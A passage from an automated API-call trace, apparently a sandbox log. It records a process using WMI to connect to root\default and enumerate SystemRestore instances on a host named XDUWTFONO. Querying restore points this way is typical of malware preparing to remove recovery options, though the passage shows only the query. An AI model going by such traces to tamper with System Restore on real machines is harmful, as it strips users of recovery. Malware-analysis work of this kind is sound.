puNameBufLength=0x6eeb20*=0x2, pName="0" | out: puNameBufLength=0x6eeb20*=0x2, pName=".") returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetInfo (in: This=0x601f1d8, uRequestedInfo=0x0, puResponse=0x6eeb58 | out: puResponse=0x6eeb58*=0xc15) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb2c | out: puCount=0x6eeb2c*=0x2) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb28*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb28*=0x11, pszText=0x0) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb28*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb28*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601f1d8, puCount=0x6eeb4c | out: puCount=0x6eeb4c*=0x2) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetText (in: This=0x601f1d8, lFlags=4, puBuffLength=0x6eeb48*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb48*=0x1f, pszText=0x0) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetText (in: This=0x601f1d8, lFlags=4, puBuffLength=0x6eeb48*=0x1f, pszText="000000000000000000000000000000" | out: puBuffLength=0x6eeb48*=0x1f, pszText="\\\\.\\root\\default:systemrestore") returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601f1d8, puCount=0x6eeb4c | out: puCount=0x6eeb4c*=0x2) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetText (in: This=0x601f1d8, lFlags=4, puBuffLength=0x6eeb48*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb48*=0x1f, pszText=0x0) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetText (in: This=0x601f1d8, lFlags=4, puBuffLength=0x6eeb48*=0x1f, pszText="000000000000000000000000000000" | out: puBuffLength=0x6eeb48*=0x1f, pszText="\\\\.\\root\\default:systemrestore") returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeadc | out: puCount=0x6eeadc*=0x2) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eead8*=0x0, pszText=0x0 | out: puBuffLength=0x6eead8*=0x11, pszText=0x0) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eead8*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eead8*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0119.153] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeaa0 | out: ppv=0x6eeaa0*=0xb51e34) returned 0x0 [0119.153] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eea98 | out: pAptType=0x6eea98*=1) returned 0x0 [0119.153] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eea9c | out: ppvObject=0x6eea9c*=0x0) returned 0x80004002 [0119.153] IUnknown:Release (This=0xb51e34) returned 0x1 [0119.153] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee6c0 | out: ppv=0x6ee6c0*=0x601f4b0) returned 0x0 [0119.153] WbemLocator:IUnknown:QueryInterface (in: This=0x601f4b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee8d8 | out: ppvObject=0x6ee8d8*=0x0) returned 0x80004002 [0119.153] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f4b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee8ec | out: ppvObject=0x6ee8ec*=0x601f2e8) returned 0x0 [0119.153] WbemLocator:IUnknown:Release (This=0x601f4b0) returned 0x0 [0119.153] WbemLocator:IUnknown:QueryInterface (in: This=0x601f2e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee50c | out: ppvObject=0x6ee50c*=0x601f2e8) returned 0x0 [0119.154] WbemLocator:IUnknown:QueryInterface (in: This=0x601f2e8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee4c8 | out: ppvObject=0x6ee4c8*=0x0) returned 0x80004002 [0119.154] WbemLocator:IUnknown:AddRef (This=0x601f2e8) returned 0x3 [0119.154] WbemLocator:IUnknown:QueryInterface (in: This=0x601f2e8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6ede24 | out: ppvObject=0x6ede24*=0x0) returned 0x80004002 [0119.154] WbemLocator:IUnknown:QueryInterface (in: This=0x601f2e8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eddd4 | out: ppvObject=0x6eddd4*=0x0) returned 0x80004002 [0119.154] WbemLocator:IUnknown:QueryInterface (in: This=0x601f2e8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edde0 | out: ppvObject=0x6edde0*=0x0) returned 0x80004002 [0119.154] CoGetContextToken (in: pToken=0x6ede40 | out: pToken=0x6ede40) returned 0x0 [0119.154] CoGetContextToken (in: pToken=0x6ee248 | out: pToken=0x6ee248) returned 0x0 [0119.154] WbemLocator:IUnknown:QueryInterface (in: This=0x601f2e8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2d8 | out: ppvObject=0x6ee2d8*=0x0) returned 0x80004002 [0119.154] WbemLocator:IUnknown:Release (This=0x601f2e8) returned 0x2 [0119.154] WbemLocator:IUnknown:Release (This=0x601f2e8) returned 0x1 [0119.154] CoGetContextToken (in: pToken=0x6ee8b8 | out: pToken=0x6ee8b8) returned 0x0 [0119.154] CoGetContextToken (in: pToken=0x6ee818 | out: pToken=0x6ee818) returned 0x0 [0119.154] WbemLocator:IUnknown:QueryInterface (in: This=0x601f2e8, riid=0x6ee8e8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee8e4 | out: ppvObject=0x6ee8e4*=0x601f2e8) returned 0x0 [0119.154] WbemLocator:IUnknown:AddRef (This=0x601f2e8) returned 0x3 [0119.154] WbemLocator:IUnknown:Release (This=0x601f2e8) returned 0x2 [0119.154] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eea7c | out: puCount=0x6eea7c*=0x2) returned 0x0 [0119.154] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=8, puBuffLength=0x6eea78*=0x0, pszText=0x0 | out: puBuffLength=0x6eea78*=0x11, pszText=0x0) returned 0x0 [0119.154] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=8, puBuffLength=0x6eea78*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eea78*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0119.154] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ee950 | out: ppv=0x6ee950*=0x6021010) returned 0x0 [0119.154] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6021010, strNetworkResource="\\\\.\\root\\default", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ee9e8 | out: ppNamespace=0x6ee9e8*=0x60210f4) returned 0x0 [0119.230] WbemLocator:IUnknown:QueryInterface (in: This=0x60210f4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee880 | out: ppvObject=0x6ee880*=0xb5aaa4) returned 0x0 [0119.231] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5aaa4, pProxy=0x60210f4, pAuthnSvc=0x6ee8d0, pAuthzSvc=0x6ee8cc, pServerPrincName=0x6ee8c4, pAuthnLevel=0x6ee8c8, pImpLevel=0x6ee8b8, pAuthInfo=0x6ee8bc, pCapabilites=0x6ee8c0 | out: pAuthnSvc=0x6ee8d0*=0xa, pAuthzSvc=0x6ee8cc*=0x0, pServerPrincName=0x6ee8c4, pAuthnLevel=0x6ee8c8*=0x6, pImpLevel=0x6ee8b8*=0x2, pAuthInfo=0x6ee8bc, pCapabilites=0x6ee8c0*=0x1) returned 0x0 [0119.231] WbemLocator:IUnknown:Release (This=0xb5aaa4) returned 0x1 [0119.231] WbemLocator:IUnknown:QueryInterface (in: This=0x60210f4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee874 | out: ppvObject=0x6ee874*=0xb5aac4) returned 0x0 [0119.231] WbemLocator:IUnknown:QueryInterface (in: This=0x60210f4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee870 | out: ppvObject=0x6ee870*=0xb5aaa4) returned 0x0 [0119.231] WbemLocator:IClientSecurity:SetBlanket (This=0xb5aaa4, pProxy=0x60210f4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0119.231] WbemLocator:IUnknown:Release (This=0xb5aaa4) returned 0x2 [0119.231] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x1 [0119.231] CoTaskMemFree (pv=0xbd4828) [0119.231] WbemLocator:IUnknown:Release (This=0x6021010) returned 0x0 [0119.231] WbemLocator:IUnknown:QueryInterface (in: This=0x60210f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee470 | out: ppvObject=0x6ee470*=0xb5aac4) returned 0x0 [0119.231] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee42c | out: ppvObject=0x6ee42c*=0x0) returned 0x80004002 [0119.232] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee24c | out: ppvObject=0x6ee24c*=0x0) returned 0x80004002 [0119.232] WbemLocator:IUnknown:AddRef (This=0xb5aac4) returned 0x3 [0119.232] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edd8c | out: ppvObject=0x6edd8c*=0x0) returned 0x80004002 [0119.232] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edd3c | out: ppvObject=0x6edd3c*=0x0) returned 0x80004002 [0119.232] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edd48 | out: ppvObject=0x6edd48*=0xb5aa24) returned 0x0 [0119.232] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5aa24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edd50 | out: pCid=0x6edd50*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.232] WbemLocator:IUnknown:Release (This=0xb5aa24) returned 0x3 [0119.232] CoGetContextToken (in: pToken=0x6edda8 | out: pToken=0x6edda8) returned 0x0 [0119.232] CoGetContextToken (in: pToken=0x6ee1b0 | out: pToken=0x6ee1b0) returned 0x0 [0119.232] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee240 | out: ppvObject=0x6ee240*=0xb5aaac) returned 0x0 [0119.233] WbemLocator:IRpcOptions:Query (in: This=0xb5aaac, pPrx=0xb5aac4, dwProperty=2, pdwValue=0x6ee268 | out: pdwValue=0x6ee268) returned 0x80004002 [0119.233] WbemLocator:IUnknown:Release (This=0xb5aaac) returned 0x3 [0119.233] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x2 [0119.233] CoGetContextToken (in: pToken=0x6ee780 | out: pToken=0x6ee780) returned 0x0 [0119.233] CoGetContextToken (in: pToken=0x6ee6e0 | out: pToken=0x6ee6e0) returned 0x0 [0119.233] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x6ee7b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6ee7ac | out: ppvObject=0x6ee7ac*=0x60210f4) returned 0x0 [0119.233] WbemLocator:IUnknown:AddRef (This=0x60210f4) returned 0x4 [0119.233] WbemLocator:IUnknown:Release (This=0x60210f4) returned 0x3 [0119.233] WbemLocator:IUnknown:Release (This=0x60210f4) returned 0x2 [0119.233] SysStringLen (param_1=0x0) returned 0x0 [0119.233] CoGetContextToken (in: pToken=0x6ee7b8 | out: pToken=0x6ee7b8) returned 0x0 [0119.233] WbemLocator:IUnknown:AddRef (This=0xb5aac4) returned 0x3 [0119.233] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee64c | out: ppvObject=0x6ee64c*=0xb5aac4) returned 0x0 [0119.233] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x3 [0119.233] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x2 [0119.233] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeac4 | out: puCount=0x6eeac4*=0x2) returned 0x0 [0119.233] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeac0*=0x0, pszText=0x0 | out: puBuffLength=0x6eeac0*=0x11, pszText=0x0) returned 0x0 [0119.233] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeac0*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeac0*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0119.233] CoGetContextToken (in: pToken=0x6ee730 | out: pToken=0x6ee730) returned 0x0 [0119.233] WbemLocator:IUnknown:AddRef (This=0xb5aac4) returned 0x3 [0119.233] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee5c4 | out: ppvObject=0x6ee5c4*=0xb5aac4) returned 0x0 [0119.234] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x3 [0119.234] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x2 [0119.234] WbemDefPath:IWbemPath:GetText (in: This=0x601f1d8, lFlags=2, puBuffLength=0x6eeac8*=0x0, pszText=0x0 | out: puBuffLength=0x6eeac8*=0xe, pszText=0x0) returned 0x0 [0119.234] WbemDefPath:IWbemPath:GetText (in: This=0x601f1d8, lFlags=2, puBuffLength=0x6eeac8*=0xe, pszText="0000000000000" | out: puBuffLength=0x6eeac8*=0xe, pszText="systemrestore") returned 0x0 [0119.234] IWbemServices:GetObject (in: This=0x60210f4, strObjectPath="systemrestore", lFlags=0, pCtx=0x0, ppObject=0x6eea7c*=0x0, ppCallResult=0x0 | out: ppObject=0x6eea7c*=0x6022990, ppCallResult=0x0) returned 0x0 [0119.275] IWbemClassObject:Get (in: This=0x6022990, wszName="__PATH", lFlags=0, pVal=0x6eea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb0c*=0, plFlavor=0x6eeb08*=0 | out: pVal=0x6eea64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\default:SystemRestore", varVal2=0x0), pType=0x6eeb0c*=8, plFlavor=0x6eeb08*=64) returned 0x0 [0119.275] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\default:SystemRestore") returned 0x4c [0119.275] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\default:SystemRestore") returned 0x4c [0119.275] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eea74 | out: ppv=0x6eea74*=0xb51e34) returned 0x0 [0119.275] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eea6c | out: pAptType=0x6eea6c*=1) returned 0x0 [0119.276] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eea70 | out: ppvObject=0x6eea70*=0x0) returned 0x80004002 [0119.276] IUnknown:Release (This=0xb51e34) returned 0x1 [0119.276] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee3e0 | out: ppv=0x6ee3e0*=0x6021010) returned 0x0 [0119.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021010, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee5f8 | out: ppvObject=0x6ee5f8*=0x0) returned 0x80004002 [0119.276] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6021010, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee60c | out: ppvObject=0x6ee60c*=0x6021020) returned 0x0 [0119.277] WbemDefPath:IUnknown:Release (This=0x6021010) returned 0x0 [0119.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021020, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee22c | out: ppvObject=0x6ee22c*=0x6021020) returned 0x0 [0119.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021020, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee1e8 | out: ppvObject=0x6ee1e8*=0x0) returned 0x80004002 [0119.277] WbemDefPath:IUnknown:AddRef (This=0x6021020) returned 0x3 [0119.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021020, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edb44 | out: ppvObject=0x6edb44*=0x0) returned 0x80004002 [0119.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021020, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edaf4 | out: ppvObject=0x6edaf4*=0x0) returned 0x80004002 [0119.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021020, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb00 | out: ppvObject=0x6edb00*=0xbb5918) returned 0x0 [0119.277] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5918, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edb08 | out: pCid=0x6edb08*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.277] WbemDefPath:IUnknown:Release (This=0xbb5918) returned 0x3 [0119.277] CoGetContextToken (in: pToken=0x6edb60 | out: pToken=0x6edb60) returned 0x0 [0119.277] CoGetContextToken (in: pToken=0x6edf68 | out: pToken=0x6edf68) returned 0x0 [0119.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021020, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edff8 | out: ppvObject=0x6edff8*=0x0) returned 0x80004002 [0119.277] WbemDefPath:IUnknown:Release (This=0x6021020) returned 0x2 [0119.277] WbemDefPath:IUnknown:Release (This=0x6021020) returned 0x1 [0119.277] CoGetContextToken (in: pToken=0x6ee8f0 | out: pToken=0x6ee8f0) returned 0x0 [0119.277] CoGetContextToken (in: pToken=0x6ee850 | out: pToken=0x6ee850) returned 0x0 [0119.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021020, riid=0x6ee920*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee91c | out: ppvObject=0x6ee91c*=0x6021020) returned 0x0 [0119.277] WbemDefPath:IUnknown:AddRef (This=0x6021020) returned 0x3 [0119.277] WbemDefPath:IUnknown:Release (This=0x6021020) returned 0x2 [0119.277] WbemDefPath:IWbemPath:SetText (This=0x6021020, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\default:SystemRestore") returned 0x0 [0119.278] IWbemClassObject:Get (in: This=0x6022990, wszName="__CLASS", lFlags=0, pVal=0x6eead4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb54*=0, plFlavor=0x6eeb50*=0 | out: pVal=0x6eead4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SystemRestore", varVal2=0x0), pType=0x6eeb54*=8, plFlavor=0x6eeb50*=64) returned 0x0 [0119.278] SysStringByteLen (bstr="SystemRestore") returned 0x1a [0119.278] SysStringByteLen (bstr="SystemRestore") returned 0x1a [0119.278] CoGetContextToken (in: pToken=0x6ee8f0 | out: pToken=0x6ee8f0) returned 0x0 [0119.278] WbemLocator:IUnknown:AddRef (This=0x60210f4) returned 0x3 [0119.278] IWbemServices:CreateInstanceEnum (in: This=0x60210f4, strFilter="SystemRestore", lFlags=17, pCtx=0x0, ppEnum=0x6eead0 | out: ppEnum=0x6eead0*=0x6022c6c) returned 0x0 [0119.280] GetCurrentThreadId () returned 0xb0c [0119.280] ResetEvent (hEvent=0xb8) returned 1 [0119.280] GetCurrentThreadId () returned 0xb0c [0119.280] GetCurrentThreadId () returned 0xb0c [0119.280] GetCurrentThreadId () returned 0xb0c [0119.280] GetCurrentThreadId () returned 0xb0c [0119.280] ResetEvent (hEvent=0xb8) returned 1 [0119.280] GetCurrentThreadId () returned 0xb0c [0119.280] GetCurrentThreadId () returned 0xb0c [0119.280] SetEvent (hEvent=0xbc) returned 1 [0119.280] SetEvent (hEvent=0xb8) returned 1 [0119.280] CloseHandle (hObject=0x4bc) returned 1 [0119.281] GetCurrentThreadId () returned 0xb0c [0119.282] ResetEvent (hEvent=0xb8) returned 1 